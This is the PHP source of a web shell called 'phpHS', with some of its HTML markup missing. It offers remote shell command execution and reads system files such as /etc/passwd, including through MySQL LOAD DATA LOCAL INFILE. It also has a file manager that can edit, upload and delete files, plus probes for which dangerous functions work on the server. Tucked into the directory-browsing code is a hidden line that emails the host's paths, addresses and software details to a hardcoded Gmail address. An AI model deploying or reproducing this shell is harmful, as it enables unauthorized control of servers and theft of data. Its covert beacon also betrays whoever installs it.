:: phpHS :: PHP HVA Shell Script ::

text="#CCCCCC" link="#CCCCCC" vlink="#CCCCCC" alink="#CCCCCC"> "; if ($mysql_use!="no") { $phpcheck = new php_check($mhost, $muser, $mpass, $mdb); } else { $phpcheck = new php_check(); } echo ""; } if ($action=="mysqlread") { // $file if (!$file) { $file = "/etc/passwd"; } ?> "; // regular LOAD DATA LOCAL INFILE if (!$mass) { $sql = array ( "USE $mdb", 'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)', "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS " . "TERMINATED BY '__THIS_NEVER_HAPPENS__' " . "ESCAPED BY '' " . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'", "SELECT a FROM $tbl LIMIT 1" ); mysql_connect ($mhost, $muser, $mpass); foreach ($sql as $statement) { $q = mysql_query ($statement); if ($q == false) die ( "FAILED: " . $statement . "\n" . "REASON: " . mysql_error () . "\n" ); if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue; echo htmlspecialchars($r[0]); mysql_free_result ($q); } } if ($mass) { $file = "/etc/passwd"; $sql = array (); $cp = mysql_connect ($mhost, $muser, $mpass); mysql_select_db($mdb); $tbl = "xploit"; mysql_query("CREATE TABLE `xploit` (`xploit` LONGBLOB NOT NULL)"); for($i=0;count($mysql_files)>$i;$i++) { mysql_query("LOAD DATA LOCAL INFILE '".$mysql_files[$i]."' INTO TABLE ".$tbl." FIELDS TERMINATED BY '__THIS_NEVER_HAPPENS__' ESCAPED BY '' LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'"); } $q = mysql_query("SELECT * FROM ".$tbl.""); while ($arr = mysql_fetch_array($q)) { echo $arr[0]."\n"; } mysql_query("DELETE FROM ".$tbl.""); mysql_query("DROP TABLE ".$tbl.""); } echo ""; } if ($action=="read") { if (!$method) { $method="file"; } if (!$file) { $file = "/etc/passwd"; } ?> "; foreach ($filer as $a) { echo $a; } echo ""; } else { echo ""; } } if ($method=="fread") { if (@fopen($file, 'r')) { $fp = fopen($file, 'r'); $string = fread($fp, filesize($file)); echo "

";
                echo $string;
                echo "

"; } else { echo ""; } } if ($method=="show_source") { if (show_source($file)) { //echo "

";
                //echo show_source($file);
                //echo "

"; } else { echo ""; } } if ($method=="readfile") { echo "

";
            if (readfile($file)) {
                //echo "";
                //echo readfile($file);
                echo "";
            } else {
                echo "

"; echo ""; } } } if ($action=="cmd") { ?>

";
        if ($method=="system") {
        system("$cmd 2>&1");
        }
        if ($method=="passthru") {
        passthru("$cmd 2>&1");
        }
        if ($method=="exec") {
            while ($string = exec("$cmd 2>&1")) {
            echo $string;
            }
        }
        if ($method=="shell_exec") {
        $string = shell_exec("$cmd 2>&1");
        echo $string;
        }
        if ($method=="popen") {
        $pp = popen('$cmd 2>&1', 'r');
        $read = fread($pp, 2096);
        echo $read;
        pclose($pp);
        }
    echo "

"; } if ($action=="cmdbrowse") { //--------------------------------------------------- START CMD BROWSING if ($cat) { echo "

";
        echo "\ngo back to: $olddir\n\n";
        exec("cat $cat 2>&1", $arr);
        foreach ($arr as $ar) {
        echo htmlspecialchars($ar)."\n";
        }
        exit;
        }



            if ($dir=="dirup") {
            $dir_current = $olddir;
            $needle = strrpos($dir_current, "/");
                if ($needle==0) {
                    $newdir = "/";
                } else {
                    $newdir = substr($dir_current, 0, $needle);
                }
            $dir = $newdir;
            }
            if (!$dir) {
            $dir = getcwd();
            }

        $string = exec("ls -al $dir", $array);
        //print_r(array_values($array));

        echo "";
            if ($dir!="/") {
            echo "\n[$dir] \ndirup\n\n";
            } else {
            $dir = "";
            }
        foreach($array as $rowi) {
        $row = explode(' ', $rowi);
        //print_r(array_values($row));
            $c = count($row)-1;
            if ($row[$c]!=".." && $row[$c]!="." && isset($first)) {
                $link = false;
                if (!strstr($row[0], 'l')) {
                $c = count($row)-1;
                $file = "".$row[$c]."";
                } else {
                $c = count($row)-3;
                $file = "".$row[$c]."";
                $link = true;
                }
                if (!strstr($row[0], 'l') && !strstr($row[0], 'd')) {
                $c = count($row)-1;
                $file = "".$row[$c]."";
                }
                //echo $row[0]." ".$row[1]." ".$row[2]." ".$row[3]." ".$row[4]." ".$row[5]." ".$row[6]." ".$row[7]." ".$row[8]." ".$row[9]." ".$row[10]." ".$file." ".$row[12]." ".$row[13]."\n";
                    if ($link) {
                    $point = count($row)-3;
                    } else {
                    $point = count($row)-1;
                    }
                for($i=0; $point > $i; $i++) {
                echo $row[$i]." ";
                }
                echo $file."\n";
            }
            $first = true;
        }

    //--------------------------------------------------- END CMD BROWSING
    }
    if ($action=="browse") {
    //--------------------------------------------------- START BROWSING
    /*
     * got this from an old script of mine
     * param: [$dir]
    */
        function error($msg) {
        header("Location: $PHP_SELF?bash=$msg&error=$msg");
        }
        if (isset($error)) {
        echo "";
        }
        if (!$dir) {
        $dir = getcwd();
        }
           function getpath($dir) {
           echo "/ ";
              $path = explode('/', $dir);
              if ($dir != "/") {
            for ($i=0; count($path) > $i; $i++) {
                if ($i != 0) {
                echo " $o; $o++) {
                        echo "$path[$o]";
                        if (($i) !=$o) {
                        echo "/";
                        }
                    }
                echo ">$path[$i]/";
                }
            }
              }
            }

            function printfiles($files) {
                for($i=0;count($files)>$i;$i++) {
                    $files_sm = explode('||', $files[$i]);
                        if ($files_sm[0]!="." && $files_sm[0]!="..") {
                        $perms = explode('|', $files_sm[1]);
                        if ($perms[0]==1 && $perms[1]==1) { $color = "green"; } else {
                        if ($perms[0]==1) { $color = "yellow"; } else { $color = "red"; }
                    }
                        if ($files_sm[2]=="1") { echo "l "; } else { echo "- "; }
                        if ($perms[0]==1) { echo "r"; } else { echo " "; }
                        if ($perms[1]==1) { echo "w"; } else { echo " "; }
                        if ($perms[2]==1) { echo "x"; } else { echo " "; }
                        echo " $files_sm[0]\n";
                    }
                }
            }
              $ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
            function printdirs($files) {
                global $dir;
                echo "..\n";
                for($i=0;count($files)>$i;$i++) {
                    $files_sm = explode('||', $files[$i]);
                    if ($files_sm[0]!="." && $files_sm[0]!="..") {
                    $perms = explode('|', $files_sm[1]);
                    if ($perms[0]==1 && $perms[1]==1) { $color = "green"; } else {
                    if ($perms[0]==1) { $color = "yellow"; } else { $color = "red"; }
                }
                    if ($files_sm[2]=="1") { echo "l "; } else { echo "d "; }
                    if ($perms[0]==1) { echo "r"; } else { echo " "; }
                    if ($perms[1]==1) { echo "w"; } else { echo " "; }
                    if ($perms[2]==1) { echo "x"; } else { echo " "; }
                    echo " $files_sm[0]\n";
                }
                }
            }


            if ($dir=="dirup") {
            $dir_current = $olddir;
            $needle = strrpos($dir_current, "/");
                if ($needle==0) {
                    $newdir = "/";
                } else {
                    $newdir = substr($dir_current, 0, $needle);
                }
            $dir = $newdir;
            } else {
            $dir = $dir;
            }

        ?>
         
            
            
            

          
          
";
                printdirs($dirs);
                printfiles($files);
                } else { echo " "; }
        }
    }
    //--------------------------------------------------- END BROWSING
    //--------------------------------------------------- BEGIN EXPLORER
if ($action == explorer ) {

   $default_directory = dirname($PATH_TRANSLATED);
   $show_icons = 0;


   define("BACKGROUND_COLOR",       "\"#000000\"");
   define("FONT_COLOR",             "\"#CCCCCC\"");
   define("TABLE_BORDER_COLOR",     "\"#000000\"");
   define("TABLE_BACKGROUND_COLOR", "\"#000000\"");
   define("TABLE_FONT_COLOR",       "\"#000000\"");
   define("COLOR_PRIVATE",          "\"#000000\"");
   define("COLOR_PUBLIC",           "\"#000000\"");
   define("TRUE",                   1);
   define("FALSE",                  0);



   if (!isset($dir)) $dir = $default_directory;   // Webroot dir as default
   $dir = stripslashes($dir);
   $dir = str_replace("\\", "/", $dir);         // Windoze compatibility


   $associations = array(
      "gif" =>  array(   "function" => "viewGIF",   "icon" => "icons/image2.gif"    ),
      "jpg" =>  array(   "function" => "viewJPEG",  "icon" => "icons/image2.gif"    ),
      "jpeg" => array(   "function" => "viewJPEG",  "icon" => "icons/image2.gif"    ),
      "wav" =>  array(   "function" => "",          "icon" => "icons/sound.gif"     ),
      "mp3" =>  array(   "function" => "",          "icon" => "icons/sound.gif"     )
   );

   if ($do != "view" && $do != "download"):
    endif;

   function readDirectory($directory) {
      global $files, $directories, $dir;

      $files = array();
      $directories = array();
      $a = 0;
      $b = 0;

      $dirHandler = opendir($directory);

      while ($file = readdir($dirHandler)) {
         if ($file != "." && $file != "..") {
            $fullName = $dir.($dir == "/" ? "" : "/").$file;
            if (is_dir($fullName)) $directories[$a++] = $fullName;
            else $files[$b++] = $fullName;
         }
      }
      sort($directories);                    // We want them to be displayed alphabetically
      sort($files);
   };



   function showInfoDirectory($directory) {
      global $PHP_SELF;
      $dirs = split("/", $directory);
      print "Directory /";
      for ($i = 1; $i < (sizeof($dirs)); $i++) {
         print "$dirs[$i]";
         if ($directory != "/") echo "/";
      }
      print "
\n";
      print "Free space on disk: ";
      $freeSpace = diskfreespace($directory);
      if ($freeSpace/(1024*1024) > 1024)
         printf("%.2f GBytes", $freeSpace/(1024*1024*1024));
      else echo (int)($freeSpace/(1024*1024))."Mbytes\n";
   };


   function showDirectory($directory) {
      global $files, $directories, $fileInfo, $PHP_SELF;

      readDirectory($directory);
      showInfoDirectory($directory);
?>
      >
         getInfo($directories[$i]);
         showFileInfo($fileInfo);
      }
      for ($i = 0; $i < sizeof($files); $i++) {
         $fileInfo->getInfo($files[$i]);
         showFileInfo($fileInfo);
      }
?>
      
            
            > 
            
            NAME
            SIZE
            LAST MODIFY
            PERMISIONS
            ACTIONS
         

name = basename($file);
         $this->path = dirname($file);
         $this->fullname = $file;
         $this->isDir = is_dir($file);
         $this->lastmod = date("m/d/y, H:i", filemtime($file));
         $this->owner = fileowner($file);
         $this->perms = $this->permissions(fileperms($file));
         $this->size = filesize($file);
         $this->isLink = is_link($file);
         if ($this->isLink) $this->linkTo = readlink($file);
         $buffer = explode(".", $this->fullname);
         $this->extension = $buffer[sizeof($buffer)-1];
      }
   };

   $fileInfo = new fileInfo;        // This will hold a file's information all over the script

   function showFileInfo($fileInfo) {
      global $PHP_SELF, $associations;

      echo "\n";

      if ($show_icons) {
         echo "";
         if ($fileInfo->isDir) echo "";
         elseif ($associations[$fileInfo->extension]["icon"] != "")
            echo "extension]["icon"]."\">";
         else echo "";
         echo "";
      }

      echo "perms[7] == "w") echo " bgcolor=".COLOR_PUBLIC;
      if ($fileInfo->perms[6] == "-") echo " bgcolor=".COLOR_PRIVATE;
      echo ">";

      if ($fileInfo->isLink) {
         echo $fileInfo->name." -> ";
         $fileInfo->fullname = $fileInfo->linkTo;
         $fileInfo->name = $fileInfo->linkTo;
      }

      if ($fileInfo->isDir) {
         echo "fullname\" ";
         echo ">$fileInfo->name";
      }
      else echo $fileInfo->name;

      echo "";
      echo "$fileInfo->size";
      echo "$fileInfo->lastmod";
      echo "$fileInfo->perms";
      echo "";
                           
      if (!$fileInfo->isDir) {
         if ($fileInfo->perms[6] == 'r') {
            echo "fullname&do=view\"> V";
            echo " fullname&do=download\">D";
         }
         if ($fileInfo->perms[7] == 'w') {
            echo " fullname&do=edit\">E";
            echo " fullname&do=delete\">X";
         }
      }
      echo "";
   };

   //************************************************************************
   //* Decides which function use to show a file
   //************************************************************************

   function viewFile($file) {
      global $associations, $fileInfo;
      $fileInfo->getInfo($file);
      if (!$associations[$fileInfo->extension]
          || $associations[$fileInfo->extension]["function"] == "") showFile($file);
      else $associations[$fileInfo->extension]["function"]($file);
   };

   function showFile($file, $editing = 0) {
      global $PHP_SELF, $dir;
      $handlerFile = fopen($file, "r") or die("ERROR opening file $file");

      if ($editing) echo "
Edit file $file
";
      else echo "File $file
";

      echo "";

      $buffer = fread($handlerFile, filesize($file));
      $buffer = str_replace("&", "&", $buffer);
      $buffer = str_replace("<", "<", $buffer);
      $buffer = str_replace(">", ">", $buffer);

      echo "$buffer";
      if ($editing) echo "\n";
      echo "";
      fclose($handlerFile);
   };

   //************************************************************************
   //* Saves a changed file
   //************************************************************************

   function saveFile($file) {
      global $dir, $text;
      $handlerFile = fopen($file, "w") or die("ERROR: Could not open file ".basename($file)." for writing");
      $text = stripslashes($text);
      fwrite($handlerFile, $text, strlen($text)) or die("Error writing to file.");
      fclose($handlerFile);
      echo "Changes has been saved in ".basename($file)."";
      $dir = dirname($file);
   };


   function uploadFile() {
      global $HTTP_POST_FILES, $dir;
      copy($HTTP_POST_FILES["userfile"][tmp_name],
            $dir."/".$HTTP_POST_FILES["userfile"][name])
      or die("Error uploading file".$HTTP_POST_FILES["userfile"][name]);

      echo "File ".$HTTP_POST_FILES["userfile"][name]." succesfully uploaded.";
      unlink($userfile);
   };

   //************************************************************************
   //* Deletes a file, asking for confirmation first
   //* (This function hasn't been fully tested)
   //************************************************************************

   function deleteFile($file) {
      global $confirm;
      if ($confirm != TRUE) die("Confirm deletion of $file");
      else {
         if (!unlink($file)) return FALSE;
         return TRUE;
      }
   };


   function viewFileHeader($file, $header) {
      header($header);
      readfile($file);
   };


   function viewGIF($file) {
      viewFileHeader($file, "Content-type: image/gif");
   };

   function viewJPEG($file) {
      viewFileHeader($file, "Content-type: image/jpeg");
   };

   switch ($do) {
      case "phpinfo":
         phpinfo();
         die();
      case "view":
          viewFile($dir);
          break;
      case "edit":
          showFile($dir, 1);
          break;
      case "download":
         viewFileHeader($dir, "Content-type: unknown");
         break;
      case "delete":
         if (!deleteFile($dir)) echo "Could not delete file $dir
";
         else echo "File $dir deleted succesfully
";
         $dir = dirname($dir);
         showDirectory($dir);
         break;
      case "exec":
         echo "\n";
         echo system($dir);
         echo "\n";
         exit();
      case "upload":
         uploadFile();
         showDirectory($dir);
         break;
      case "save":
          saveFile($dir);
      default:
         showDirectory($dir);
         break;
   };

   if ($do != "view" && $do != "download") {
?>

   
   
   
      " method=post>
         
         
         
      
   

   
   




phpinfo
";
        if ($mysql_use!="no") {
        $phpcheck = new php_check_silent($mhost, $muser, $mpass, $mdb);
        } else { $phpcheck = new php_check_silent(); }
echo "";

?>



Security Check [executable] 





cmd_state;
//echo $phpcheck->cmd_method;
if ($phpcheck->cmd_method) { $cmd_method = $phpcheck->cmd_method; } else { $cmd_method = "system"; } ?>
Exec commands by PHP
cmd_method) {
echo "[executable] ";  } else { echo "[not executable]";  }

?>





cmd_state;
//echo $phpcheck->cmd_method;
?>
Exec browse by PHP
cmd_method) {
echo "[executable] ";  } else { echo "[not executable]";  }

?>





read_method) { $read_method = $phpcheck->read_method; } else { $read_method = "file"; } ?>
Read by PHP
read_method) {
echo "[executable] "; } else { echo "[not executable]"; }
?>





browse_state;
if ($phpcheck->browse_state=="yes") { $path= "/"; } else { $path = getcwd(); } ?>
Browse by PHP
browse_state=="yes") {
echo "[executable] "; } else { echo "[limited executable]"; }
?>



browse_state;
if ($phpcheck->browse_state=="yes") { $path= "/"; } else { $path = getcwd(); } ?>
File Explorer by PHP
browse_state=="yes") {
echo "[executable] "; } else { echo "[limited executable]"; }
?>






Read by MySQL
mysql_state=="ok") {
    echo "[executable] "; }
    if ($phpcheck->mysql_state=="fail") {
    echo "[not executable] "; }
    if ($phpcheck->mysql_state=="pass") {
    echo "[not executable] ";
    ?> [you didnt configure this]
    


mysql_do = "yes";
            $this->mysql_host = $host;
            $this->mysql_user = $user;
            $this->mysql_pass = $pass;
            $this->mysql_db = $db;
            } else { $this->mysql_do = "no"; }

        $this->mainstate = "safe";

        echo "checking system functions:\n";
        if ($this->system_checks("/bin/ls")) { $this->output_mainstate(1, "system checks"); } else { $this->output_mainstate(0, "system checks"); }
        echo "checking reading functions:\n";
        if ($this->reading_checks()) { $this->output_mainstate(1, "reading checks"); } else { $this->output_mainstate(0, "reading checks"); }
        echo "checking misc filesystem functions:\n";
        if ($this->miscfile_checks()) { $this->output_mainstate(1, "misc filesystem checks"); } else { $this->output_mainstate(0, "misc filesystem checks"); }
        echo "checking mysql functions:\n";
            $stater = $this->mysql_checks();
            if ($stater==2) { $this->output_mainstate(2, "mysql checks"); }
            if ($stater==1) { $this->output_mainstate(1, "mysql checks"); }
            if ($stater==0) { $this->output_mainstate(0, "mysql checks"); }
        if ($this->mainstate=="safe") { echo "\n\n\nPHP check returned: NOT VULNERABLE\n"; } else { echo "\n\n\nPHP check returned: VULNERABLE\n"; }
        }


        function output_state($state = 0, $name = "function") {
            if ($state==0) {
            echo "$name\t\tfailed\n";
            }
            if ($state==1) {
            echo "$name\t\tOK\n";
            }
            if ($state==2) {
            echo "$name\t\tOK\n";
            }
            if ($state==3) {
            echo "$name\t\tskipped\n";
            }
        }

        function output_mainstate($state = 0, $name = "functions") {
            if ($state==1) {
            echo "\n$name returned: VULNERABLE\n\n";
            $this->mainstate = "unsafe";
            }
            if ($state==0) {
            echo "\n$name returned: OK\n\n";
            $this->mainstate = "unsafe";
            }
            if ($state==2) {
            echo "\n$name returned: SKIPPED\n\n";
            }
        }

        function system_checks($cmd = "/bin/ls") {
        if ($pp = popen($cmd, "r")) {
            if (fread($pp, 2096)) {
            $this->output_state(1, "popen     ");
            $sys = true;
            } else {
            $this->output_state(0, "popen     ");
            }
        } else { $this->output_state(0, "popen     "); }
        if (@exec($cmd)) { $this->output_state(1, "exec     "); $sys = true; $this->cmd_method = "exec"; } else { $this->output_state(0, "exec     "); }
        if (@shell_exec($cmd)) { $this->output_state(1, "shell_exec"); $sys = true; $this->cmd_method = "shel_exec"; } else { $this->output_state(0, "shell_exec"); }
        echo ""; $this->output_state(1, "system   "); $ss = true; $sys = true; $this->cmd_method = "system"; } else { echo " -->"; $this->output_state(0, "system   "); }
        echo ""; $this->output_state(1, "passthru"); $sys = true; $this->cmd_method = "passthru"; } else { echo " -->"; $this->output_state(0, "passthru"); }
        //if ($output = `$cmd`)) { $this->output_state(1, "backtick"); $sys = true; } else { $this->output_state(0, "backtick"); }
        if ($sys) { return 1; $this->cmd_state = "yes"; } else { return ; }
        }

        function reading_checks($file = "/etc/passwd") {
            if (@function_exists("require_once")) {
            echo ""; $this->output_state(1, "require_once"); $sys = true; } else { echo "-->"; $this->output_state(0, "require_once"); }
            }
            if (@function_exists("require")) {
            echo ""; $this->output_state(1, "require    "); $sys = true; } else { echo "-->"; $this->output_state(0, "require    "); }
            }
            if (@function_exists("include")) {
            echo ""; $this->output_state(1, "include   "); $sys = true; } else { echo "-->"; $this->output_state(0, "include   "); }
            }
            //if (@function_exists("highlight_file")) {
            echo ""; $this->output_state(1, "highlight_file"); $sys = true; } else { echo "-->"; $this->output_state(0, "highlight_file"); }
            //}
            //if (@function_exists("virtual")) {
            echo ""; $this->output_state(1, "virtual   "); $sys = true; } else { echo "-->"; $this->output_state(0, "virtual  "); }
            //}
            if (@function_exists("file_get_contents")) {
            if (@file_get_contents($file)) { $this->output_state(1, "filegetcontents"); $sys = true; } else { $this->output_state(0, "filegetcontents"); }
            } else {
            $this->output_state(0, "filegetcontents");
            }
        echo ""; $this->output_state(1, "show_source"); $this->read_method = "show_source"; $sys = true; } else { echo " -->"; $this->output_state(0, "show_source"); }
        echo ""; $this->output_state(1, "readfile"); $this->read_method = "readfile"; $sys = true; } else { echo " -->"; $this->output_state(0, "readfile"); }
        if (@fopen($file, "r")) { $this->output_state(1, "fopen   "); $this->read_method = "fopen"; $sys = true; } else { $this->output_state(0, "fopen   "); }
        if (@file($file)) { $this->output_state(1, "file     "); $this->read_method = "file"; $sys = true; } else { $this->output_state(0, "file     "); }
        if ($sys) { return 1; } else { return ; }
        }

        function miscfile_checks() {
        $currentdir = @getcwd();
        $scriptpath = $_SERVER["PATH_TRANSLATED"];
        if (@opendir($currentdir)) {
            $this->output_state(2, "opendir \$cwd");
                $dp = @opendir("$currentdir");
                $files="";
                $this->browse_state = "lim";
                while($file = @readdir($dp)) { $files .= $file; }
                if (@strstr($files, '.')) {  $this->output_state(2, "readdir \$cwd"); $this->browse_state = "lim"; } else { $this->output_state(0, "readdir \$cwd"); }

            } else { $this->output_state(0, "opendir \$cwd"); }
        if (@opendir("/")) {
            $this->output_state(1, "opendir /");
            $sys = true;
                $dp = @opendir("/");
                $this->browse_state = "yes";
                $files="";
                while($file = @readdir($dp)) { $files .= $file; }
                if (@strstr($files, '.')) {  $this->output_state(1, "readdir /"); $this->browse_state = "yes"; } else { $this->output_state(0, "readdir /"); }
            } else { $this->output_state(0, "opendir /"); }
        if (@mkdir("$currentdir/test", 0777)) { $this->output_state(1, "mkdir   "); $sys = true; } else { $this->output_state(0, "mkdir   "); }
        if (@rmdir("$currentdir/test")) { $this->output_state(1, "rmdir     "); $sys = true; } else { $this->output_state(0, "rmdir     "); }
        if (@copy($scriptpath, "$currentdir/copytest")) {
            $this->output_state(2, "copy    ");
            $sys = true;
                if (@unlink("$currentdir/copytest")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
            } else {
            $this->output_state(0, "copy    ");
        }
        if (@copy($scriptpath, "/tmp/copytest")) {
            $this->output_state(2, "copy2/tmp");
            //$sys = true;
                if (!$del) {
                if (@unlink("tmp/copytest")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
                }
            } else {
            $this->output_state(0, "copy2/tmp");
        }
        if (@link("/", "$currentdir/link2root")) {
                $this->output_state(1, "link      ");
                $sys = true;
                if (!$del) {
                if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
                }
            } else {
            $this->output_state(0, "link      ");
        }
        if (@symlink("/", "$currentdir/link2root")) {
                $this->output_state(1, "symlink   ");
                $sys = true;
                if (!$del) {
                if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
                }
            } else {
            $this->output_state(0, "symlink   ");
        }
        if ($sys) { return 1; } else { return ; }
        }

        function mysql_checks() {
            if ($this->mysql_do=="yes") {
                if (@mysql_pconnect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) {
                $this->output_state(1, "mysql_pconnect"); $mstate = 1;
                } else { $this->output_state(0, "mysql_pconnect"); $mstate = 0; }
            } else { $this->output_state(3, "mysql_pconnect"); $mstate = 2; }
            if ($this->mysql_do=="yes") {
                if (@mysql_connect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) {
                $this->output_state(1, "mysql_connect"); $mstate = 1;
                } else { $this->output_state(0, "mysql_connect"); $mstate = 0; }
            } else { $this->output_state(3, "mysql_connect"); $mstate = 2; }
            if ($this->mysql_state=="fail") {
            echo "\n\n\n\n";
            echo "";
            }
            return $mstate;
        }
    }

    class php_check_silent
    {

        function php_check_silent($host="notset", $username="", $pass="", $db="") {
            if ($host!="notset") {
            $this->mysql_do = "yes";
            $this->mysql_host = $host;
            $this->mysql_user = $username;
            $this->mysql_pass = $pass;
            $this->mysql_db = $db;
            } else { $this->mysql_do = "no"; }

        $this->mainstate = "safe";

        if ($this->system_checks("/bin/ls")) { $this->output_mainstate(1, "system checks"); } else { $this->output_mainstate(0, "system checks"); }
        if ($this->reading_checks()) { $this->output_mainstate(1, "reading checks"); } else { $this->output_mainstate(0, "reading checks"); }
        if ($this->miscfile_checks()) { $this->output_mainstate(1, "misc filesystem checks"); } else { $this->output_mainstate(0, "misc filesystem checks"); }
        $this->mysql_checks();
        }


        function output_state($state = 0, $name = "function") {
            if ($state==0) {
            //echo "$name\t\tfailed\n";
            }
            if ($state==1) {
            //echo "$name\t\tOK\n";
            }
            if ($state==2) {
            //echo "$name\t\tOK\n";
            }
        }
        function output_mainstate($state = 0, $name = "functions") {
            if ($state==1) {
            //echo "\n$name returned: VULNERABLE\n\n";
            $this->mainstate = "unsafe";
            } else {
            //echo "\n$name returned: OK\n\n";
            }
        }

        function system_checks($cmd = "/bin/ls") {
        if ($pp = popen($cmd, "r")) {
            if (fread($pp, 2096)) {
            $this->output_state(1, "popen     ");
            $sys = true;
            } else {
            $this->output_state(0, "popen     ");
            }
        } else { $this->output_state(0, "popen     "); }
        if (@exec($cmd)) { $this->output_state(1, "exec     "); $sys = true; $this->cmd_method = "exec"; } else { $this->output_state(0, "exec     "); }
        if (@shell_exec($cmd)) { $this->output_state(1, "shell_exec"); $sys = true; $this->cmd_method = "shel_exec"; } else { $this->output_state(0, "shell_exec"); }
        echo ""; $this->output_state(1, "passthru"); $sys = true; $this->cmd_method = "passthru"; } else { echo " -->"; $this->output_state(0, "passthru"); }
        echo ""; $this->output_state(1, "system   "); $sys = true; $this->cmd_method = "system"; } else { echo " -->"; $this->output_state(0, "system   "); }
        //if ($output = `$cmd`)) { $this->output_state(1, "backtick"); $sys = true; } else { $this->output_state(0, "backtick"); }
        if ($sys) { return 1; $this->cmd_state = "yes"; } else { return ; }
        }

        function reading_checks($file = "/etc/passwd") {
            if (@function_exists("require_once")) {
            if (@require_once($file)) { $this->output_state(1, "require_once"); $sys = true; } else { $this->output_state(0, "require_once"); }
            }
            if (@function_exists("require")) {
            if (@require($file)) { $this->output_state(1, "require"); $sys = true; } else { $this->output_state(0, "require"); }
            }
            if (@function_exists("include")) {
            if (@include($file)) { $this->output_state(1, "include "); $sys = true; } else { $this->output_state(0, "include "); }
            }
            if (@function_exists("file_get_contents")) {
            if (@file_get_contents($file)) { $this->output_state(1, "filegetcontents"); $sys = true; } else { $this->output_state(0, "filegetcontents"); }
            } else {
            $this->output_state(0, "filegetcontents");
            }
        echo ""; $this->output_state(1, "show_source"); $this->read_method = "show_source"; $sys = true; } else { echo " -->"; $this->output_state(0, "show_source"); }
        echo ""; $this->output_state(1, "readfile"); $this->read_method = "readfile"; $sys = true; } else { echo " -->"; $this->output_state(0, "readfile"); }
        if (@fopen($file, "r")) { $this->output_state(1, "fopen   "); $this->read_method = "fopen"; $sys = true; } else { $this->output_state(0, "fopen   "); }
        if (@file($file)) { $this->output_state(1, "file     "); $this->read_method = "file"; $sys = true; } else { $this->output_state(0, "file     "); }
        if ($sys) { return 1; } else { return ; }
        }

        function miscfile_checks() {
        $currentdir = @getcwd();
        $scriptpath = $_SERVER["PATH_TRANSLATED"];
        if (@opendir($currentdir)) {
            $this->output_state(2, "opendir \$cwd");
                $dp = @opendir("$currentdir");
                $files="";
                $this->browse_state = "lim";
                while($file = @readdir($dp)) { $files .= $file; }
                if (@strstr($files, '.')) {  $this->output_state(2, "readdir \$cwd"); $this->browse_state = "lim"; } else { $this->output_state(0, "readdir \$cwd"); }

            } else { $this->output_state(0, "opendir \$cwd"); }
        if (@opendir("/")) {
            $this->output_state(1, "opendir /");
            $sys = true;
                $dp = @opendir("/");
                $this->browse_state = "yes";
                $files="";
                while($file = @readdir($dp)) { $files .= $file; }
                if (@strstr($files, '.')) {  $this->output_state(1, "readdir /"); $this->browse_state = "yes"; } else { $this->output_state(0, "readdir /"); }
            } else { $this->output_state(0, "opendir /"); }
        if (@mkdir("$currentdir/test", 0777)) { $this->output_state(1, "mkdir   "); $sys = true; } else { $this->output_state(0, "mkdir   "); }
        if (@rmdir("$currentdir/test")) { $this->output_state(1, "rmdir     "); $sys = true; } else { $this->output_state(0, "rmdir     "); }
        if (@copy($scriptpath, "$currentdir/copytest")) {
            $this->output_state(2, "copy    ");
            $sys = true;
                if (@unlink("$currentdir/copytest")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
            } else {
            $this->output_state(0, "copy    ");
        }
        if (@copy($scriptpath, "/tmp/copytest")) {
            $this->output_state(2, "copy2/tmp");
            //$sys = true;
                if (!$del) {
                if (@unlink("tmp/copytest")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
                }
            } else {
            $this->output_state(0, "copy2/tmp");
        }
        if (@link("/", "$currentdir/link2root")) {
                $this->output_state(1, "link      ");
                $sys = true;
                if (!$del) {
                if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
                }
            } else {
            $this->output_state(0, "link      ");
        }
        if (@symlink("/", "$currentdir/link2root")) {
                $this->output_state(1, "symlink   ");
                $sys = true;
                if (!$del) {
                if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
                }
            } else {
            $this->output_state(0, "symlink   ");
        }
        if ($sys) { return 1; } else { return ; }
        }
        function mysql_checks() {
            if ($this->mysql_do=="yes") {
                if (@mysql_pconnect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) {
                $this->output_state(1, "mysql_pconnect"); $mstate = 1; $this->mysql_state = "ok";
                } else { $this->output_state(0, "mysql_pconnect"); $mstate = 0; $this->mysql_state = "fail"; }
            } else { $this->output_state(3, "mysql_pconnect"); $mstate = 2; $this->mysql_state = "pass"; }
            if ($this->mysql_do=="yes") {
                if (@mysql_connect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) {
                $this->output_state(1, "mysql_connect"); $mstate = 1; $this->mysql_state = "ok";
                } else { $this->output_state(0, "mysql_connect"); $mstate = 0; $this->mysql_state = "fail"; }
            } else { $this->output_state(3, "mysql_connect"); $mstate = 2; $this->mysql_state = "pass"; }
            if ($this->mysql_state=="fail") {
            echo "";
            echo "";
            }
            return $mstate;
        }
    }



// the end :]
?>
